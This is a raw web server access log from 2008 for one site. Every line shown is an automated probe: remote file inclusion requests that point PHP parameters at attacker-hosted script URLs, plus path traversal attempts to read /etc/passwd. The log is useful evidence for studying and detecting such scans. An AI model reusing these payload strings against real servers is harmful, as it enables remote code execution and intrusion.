217.160.203.190 - - [29/May/2008:12:10:51 -0700] "GET /modules/My_eGallery/index.php?basepath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:10:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.25.107.34 - - [29/May/2008:12:11:00 -0700] "GET /logs/access_080306.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.25.107.34 - - [29/May/2008:12:11:00 -0700] "GET /logs/access_080115.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:11:01 -0700] "GET /logs/access_080327.log/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:11:01 -0700] "GET /logs/access_080303.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:11:04 -0700] "GET //index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:11:11 -0700] "GET /logs//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:11:23 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:12:11:31 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.28.24 - - [29/May/2008:12:11:34 -0700] "GET /logs//errors.php?error=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.214.28.24 - - [29/May/2008:12:11:35 -0700] "GET //errors.php?error=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:12:11:37 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:12:11:47 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:12:11:48 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [29/May/2008:12:12:21 -0700] "GET /logs/access_080412.log//config/dbutil.bck.php?confdir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:12:12:26 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:12:12:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:12:12:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:12:12:36 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:12:12:37 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.135.11.22 - - [29/May/2008:12:12:37 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:12:12:40 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.90.214 - - [29/May/2008:12:12:54 -0700] "GET /logs/index.php?pagina=../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
62.212.90.214 - - [29/May/2008:12:12:56 -0700] "GET /index.php?pagina=../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:13:03 -0700] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:13:21 -0700] "GET /logs/access_080308.log//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:13:21 -0700] "GET //lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:13:27 -0700] "GET /logs//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:12:13:30 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:12:13:31 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:13:40 -0700] "GET /logs/access_080204.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:12:13:55 -0700] "GET /logs/index.php?body=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:12:13:57 -0700] "GET /index.php?body=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:14:17 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:14:17 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:14:18 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:14:27 -0700] "GET /classes/core/language.php?rootdir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.131.225 - - [29/May/2008:12:14:28 -0700] "GET /logs/index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:12:14:38 -0700] "GET /logs/access_080303.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:14:39 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:14:40 -0700] "GET /logs//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:12:14:41 -0700] "GET //lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:12:14:42 -0700] "GET //index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:14:43 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:12:14:49 -0700] "GET /logs//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:15:09 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.132.170 - - [29/May/2008:12:15:27 -0700] "GET /index.php?pagina=../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
209.51.132.170 - - [29/May/2008:12:15:30 -0700] "GET /logs/index.php?pagina=../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:12:15:37 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:12:15:37 -0700] "GET /classes/core/language.php?rootdir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.196.106 - - [29/May/2008:12:15:37 -0700] "GET /logs/classes/core/language.php?rootdir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:15:55 -0700] "GET /logs/access_080225.log//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:15:56 -0700] "GET //lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:15:57 -0700] "GET /logs//lib/base.php?BaseCfg[BaseDir]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:16:01 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:16:01 -0700] "GET //component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:16:02 -0700] "GET /logs//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:16:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:16:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:17:00 -0700] "GET /logs/access_080327.log/newspublish/include.php?path[docroot]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:17:07 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:17:49 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:17:49 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:17:49 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:12:17:51 -0700] "GET /logs/access_080327.log/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:12:17:57 -0700] "GET /logs/access_080204.log//index.php?incl=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:17:57 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:17:58 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:17:58 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.46.202 - - [29/May/2008:12:17:59 -0700] "GET /logs/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [29/May/2008:12:17:59 -0700] "GET /homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:18:03 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:18:04 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:18:18 -0700] "GET /logs/access_080306.log//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:18:18 -0700] "GET //errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:18:19 -0700] "GET /logs//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:18:24 -0700] "GET /logs//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:18:27 -0700] "GET //index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.46.202 - - [29/May/2008:12:18:34 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [29/May/2008:12:18:34 -0700] "GET /homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [29/May/2008:12:18:34 -0700] "GET /logs/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:18:35 -0700] "GET /logs/access_080223.log//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.51.46.202 - - [29/May/2008:12:18:39 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:12:18:56 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:18:56 -0700] "GET /logs/access_080308.log//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:12:18:56 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:18:57 -0700] "GET //lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:18:58 -0700] "GET /logs//lang.php?subpage=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:19:16 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:19:16 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:19:16 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:19:29 -0700] "GET /logs/access_080306.log//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:19:29 -0700] "GET //errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:19:29 -0700] "GET /logs//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:19:31 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:19:31 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:19:36 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:12:19:41 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:12:19:41 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:12:19:41 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [29/May/2008:12:19:42 -0700] "GET /logs/access_080303.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:20:08 -0700] "GET /logs/access_080223.log//errors.php?error=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:20:16 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:20:16 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:20:17 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.46.202 - - [29/May/2008:12:20:36 -0700] "GET /homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:20:58 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:21:01 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:21:02 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:12:21:04 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:21:06 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:21:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:21:25 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
